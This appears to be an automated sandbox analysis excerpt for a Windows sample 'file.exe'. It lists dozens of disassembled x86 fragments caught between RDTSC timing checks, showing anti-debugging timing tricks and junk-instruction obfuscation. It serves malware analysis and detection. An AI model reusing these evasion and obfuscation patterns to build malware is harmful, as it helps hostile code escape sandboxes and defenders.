        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208F9 second address: 4A20041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007F5908B64FB5h 0x0000001a xor eax, eax 0x0000001c mov dword ptr [esp], 00000000h 0x00000023 mov dword ptr [esp+04h], 00000000h 0x0000002b call 00007F590C9E09BBh 0x00000030 mov edi, edi 0x00000032 jmp 00007F5908B64E6Ah 0x00000037 xchg eax, ebp 0x00000038 jmp 00007F5908B64E70h 0x0000003d push eax 0x0000003e pushad 0x0000003f pushad 0x00000040 mov si, bx 0x00000043 push edx 0x00000044 pop ecx 0x00000045 popad 0x00000046 popad 0x00000047 xchg eax, ebp 0x00000048 pushad 0x00000049 mov dl, 12h 0x0000004b movzx esi, bx 0x0000004e popad 0x0000004f mov ebp, esp 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F5908B64E6Eh 0x00000058 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20041 second address: 4A20047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20047 second address: 4A200B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a jmp 00007F5908B64E79h 0x0000000f push 619DDA89h 0x00000014 jmp 00007F5908B64E77h 0x00000019 xor dword ptr [esp], 145B44C1h 0x00000020 jmp 00007F5908B64E76h 0x00000025 call 00007F5908B64E69h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A200B1 second address: 4A200BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 7C4Eh 0x00000008 popad 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A200BA second address: 4A20100 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx eax, di 0x00000010 pushfd 0x00000011 jmp 00007F5908B64E79h 0x00000016 jmp 00007F5908B64E6Bh 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20100 second address: 4A20106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20106 second address: 4A2012E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5908B64E78h 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2012E second address: 4A20132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20132 second address: 4A20138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20138 second address: 4A20191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d mov esi, edi 0x0000000f mov si, bx 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F590909A3EFh 0x00000019 or esi, 57340A7Eh 0x0000001f jmp 00007F590909A3F9h 0x00000024 popfd 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov dx, 348Ch 0x00000031 popad 0x00000032 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20191 second address: 4A201A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5908B64E71h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A201A6 second address: 4A201C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F590909A3EFh 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A201C2 second address: 4A201DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A201DF second address: 4A20287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F590909A3EDh 0x0000000b sub si, 5226h 0x00000010 jmp 00007F590909A3F1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr fs:[00000000h] 0x0000001f pushad 0x00000020 jmp 00007F590909A3ECh 0x00000025 mov ecx, 204D4461h 0x0000002a popad 0x0000002b nop 0x0000002c pushad 0x0000002d mov ebx, eax 0x0000002f pushfd 0x00000030 jmp 00007F590909A3F6h 0x00000035 xor ax, AE28h 0x0000003a jmp 00007F590909A3EBh 0x0000003f popfd 0x00000040 popad 0x00000041 push eax 0x00000042 jmp 00007F590909A3F9h 0x00000047 nop 0x00000048 jmp 00007F590909A3EEh 0x0000004d sub esp, 18h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 mov si, bx 0x00000056 push edx 0x00000057 pop esi 0x00000058 popad 0x00000059 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20287 second address: 4A202A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A202A4 second address: 4A202A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A202A8 second address: 4A202C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A202C5 second address: 4A20324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 79h 0x00000005 movzx ecx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F590909A3F2h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F590909A3EEh 0x00000019 sbb eax, 67FA0A08h 0x0000001f jmp 00007F590909A3EBh 0x00000024 popfd 0x00000025 movzx eax, dx 0x00000028 popad 0x00000029 push ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F590909A3F7h 0x00000031 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20324 second address: 4A20382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 22BF390Ah 0x00000008 mov dx, DBD6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], esi 0x00000012 pushad 0x00000013 jmp 00007F5908B64E73h 0x00000018 pushfd 0x00000019 jmp 00007F5908B64E78h 0x0000001e sub al, 00000028h 0x00000021 jmp 00007F5908B64E6Bh 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, edi 0x00000029 pushad 0x0000002a mov ebx, esi 0x0000002c mov edi, esi 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 mov ch, bh 0x00000033 push eax 0x00000034 push edx 0x00000035 mov ebx, esi 0x00000037 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20382 second address: 4A20386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20386 second address: 4A203AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, edi 0x00000008 jmp 00007F5908B64E6Ah 0x0000000d mov eax, dword ptr [75C74538h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5908B64E6Ah 0x0000001b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A203AB second address: 4A203BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A203BA second address: 4A203E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6579868Ah 0x00000008 mov ax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [ebp-08h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5908B64E78h 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A203E5 second address: 4A2047A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b pushad 0x0000000c mov cl, bl 0x0000000e pushfd 0x0000000f jmp 00007F590909A3EEh 0x00000014 and ch, FFFFFFD8h 0x00000017 jmp 00007F590909A3EBh 0x0000001c popfd 0x0000001d popad 0x0000001e nop 0x0000001f jmp 00007F590909A3F6h 0x00000024 push eax 0x00000025 pushad 0x00000026 mov esi, edx 0x00000028 call 00007F590909A3EDh 0x0000002d movzx esi, di 0x00000030 pop ebx 0x00000031 popad 0x00000032 nop 0x00000033 jmp 00007F590909A3F8h 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F590909A3F7h 0x00000042 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2047A second address: 4A204DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov ebx, 61EAAAE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr fs:[00000000h], eax 0x00000014 jmp 00007F5908B64E6Dh 0x00000019 mov dword ptr [ebp-18h], esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F5908B64E73h 0x00000025 add eax, 5B00E61Eh 0x0000002b jmp 00007F5908B64E79h 0x00000030 popfd 0x00000031 mov cx, B3E7h 0x00000035 popad 0x00000036 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A204DA second address: 4A20500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000018h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F590909A3EDh 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20500 second address: 4A20506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20506 second address: 4A2050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2050A second address: 4A20555 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [eax+00000FDCh] 0x00000011 jmp 00007F5908B64E76h 0x00000016 test ecx, ecx 0x00000018 pushad 0x00000019 mov dh, ah 0x0000001b mov di, 9AEEh 0x0000001f popad 0x00000020 jns 00007F5908B64E8Dh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20555 second address: 4A20559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20559 second address: 4A2055F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1005D second address: 4A10096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F590909A3F3h 0x0000000a adc ecx, 7FA0B62Eh 0x00000010 jmp 00007F590909A3F9h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10096 second address: 4A100BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5908B64E77h 0x00000008 pop esi 0x00000009 mov cl, dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A100BD second address: 4A100C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A100C1 second address: 4A100C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A100C7 second address: 4A100D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F590909A3EBh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A100D6 second address: 4A10104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5908B64E6Ch 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10104 second address: 4A1010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1010A second address: 4A1010E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1010E second address: 4A10141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F590909A3F2h 0x00000012 sbb ax, C5F8h 0x00000017 jmp 00007F590909A3EBh 0x0000001c popfd 0x0000001d push esi 0x0000001e pop ebx 0x0000001f popad 0x00000020 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10141 second address: 4A10170 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F5908B64E6Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10170 second address: 4A10174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10174 second address: 4A10190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A101CE second address: 4A101D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A101D4 second address: 4A1022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ah, 91h 0x0000000e pushfd 0x0000000f jmp 00007F5908B64E77h 0x00000014 add ch, FFFFFF9Eh 0x00000017 jmp 00007F5908B64E79h 0x0000001c popfd 0x0000001d popad 0x0000001e mov cx, E867h 0x00000022 popad 0x00000023 test al, al 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1022B second address: 4A1023A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1023A second address: 4A102B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5908B64E6Fh 0x00000008 pop eax 0x00000009 jmp 00007F5908B64E79h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007F5908B65119h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F5908B64E73h 0x0000001f pushfd 0x00000020 jmp 00007F5908B64E78h 0x00000025 sbb ecx, 70363DB8h 0x0000002b jmp 00007F5908B64E6Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A102FD second address: 4A1031A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1031A second address: 4A10357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5908B64E77h 0x00000009 adc esi, 39F4979Eh 0x0000000f jmp 00007F5908B64E79h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10357 second address: 4A1039B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 call 00007F590909A3EAh 0x0000000e call 00007F590909A3F2h 0x00000013 pop ecx 0x00000014 pop ebx 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F590909A3F4h 0x00000023 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1039B second address: 4A1039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1039F second address: 4A103A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103A5 second address: 4A103E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5908B64E6Dh 0x00000013 adc cx, 1B46h 0x00000018 jmp 00007F5908B64E71h 0x0000001d popfd 0x0000001e mov dx, cx 0x00000021 popad 0x00000022 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10441 second address: 4A1045D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1045D second address: 4A10493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F5908B64E79h 0x0000000a sbb ax, C776h 0x0000000f jmp 00007F5908B64E71h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10493 second address: 4A10513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 92B2h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F597A2A83D3h 0x00000012 pushad 0x00000013 mov al, dh 0x00000015 popad 0x00000016 js 00007F590909A459h 0x0000001c pushad 0x0000001d mov edi, esi 0x0000001f call 00007F590909A3F2h 0x00000024 pushfd 0x00000025 jmp 00007F590909A3F2h 0x0000002a adc eax, 56581628h 0x00000030 jmp 00007F590909A3EBh 0x00000035 popfd 0x00000036 pop ecx 0x00000037 popad 0x00000038 cmp dword ptr [ebp-14h], edi 0x0000003b pushad 0x0000003c mov si, di 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 pop eax 0x00000043 popad 0x00000044 jne 00007F597A2A838Ah 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f jmp 00007F590909A3F0h 0x00000054 popad 0x00000055 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106A8 second address: 4A00E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F5979D72DFEh 0x0000000f xor eax, eax 0x00000011 jmp 00007F5908B3E59Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov esi, eax 0x00000023 cmp esi, 00000000h 0x00000026 setne al 0x00000029 xor ebx, ebx 0x0000002b test al, 01h 0x0000002d jne 00007F5908B64E67h 0x0000002f jmp 00007F5908B64F6Fh 0x00000034 call 00007F590C9C166Dh 0x00000039 mov edi, edi 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F5908B64E71h 0x00000042 sbb ah, 00000046h 0x00000045 jmp 00007F5908B64E71h 0x0000004a popfd 0x0000004b jmp 00007F5908B64E70h 0x00000050 popad 0x00000051 xchg eax, ebp 0x00000052 jmp 00007F5908B64E70h 0x00000057 push eax 0x00000058 jmp 00007F5908B64E6Bh 0x0000005d xchg eax, ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 mov ecx, edx 0x00000063 pushad 0x00000064 popad 0x00000065 popad 0x00000066 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E49 second address: 4A00E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109C5 second address: 4A109F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 pushfd 0x00000011 jmp 00007F5908B64E6Bh 0x00000016 jmp 00007F5908B64E73h 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A62 second address: 4A10A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A71 second address: 4A10A7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, CD0Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A7A second address: 4A10AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 4EB833FEh 0x0000000c jmp 00007F590909A3ECh 0x00000011 xor dword ptr [esp], 3B7EAFD6h 0x00000018 pushad 0x00000019 mov di, cx 0x0000001c pushfd 0x0000001d jmp 00007F590909A3EAh 0x00000022 or si, 5DF8h 0x00000027 jmp 00007F590909A3EBh 0x0000002c popfd 0x0000002d popad 0x0000002e call 00007F597A29F49Eh 0x00000033 push 75C12B70h 0x00000038 push dword ptr fs:[00000000h] 0x0000003f mov eax, dword ptr [esp+10h] 0x00000043 mov dword ptr [esp+10h], ebp 0x00000047 lea ebp, dword ptr [esp+10h] 0x0000004b sub esp, eax 0x0000004d push ebx 0x0000004e push esi 0x0000004f push edi 0x00000050 mov eax, dword ptr [75C74538h] 0x00000055 xor dword ptr [ebp-04h], eax 0x00000058 xor eax, ebp 0x0000005a push eax 0x0000005b mov dword ptr [ebp-18h], esp 0x0000005e push dword ptr [ebp-08h] 0x00000061 mov eax, dword ptr [ebp-04h] 0x00000064 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000006b mov dword ptr [ebp-08h], eax 0x0000006e lea eax, dword ptr [ebp-10h] 0x00000071 mov dword ptr fs:[00000000h], eax 0x00000077 ret 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007F590909A3F0h 0x00000081 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10AD3 second address: 4A10AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10AD7 second address: 4A10ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10ADD second address: 4A10AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5908B64E6Dh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B41 second address: 4A10B5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B5E second address: 4A10B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
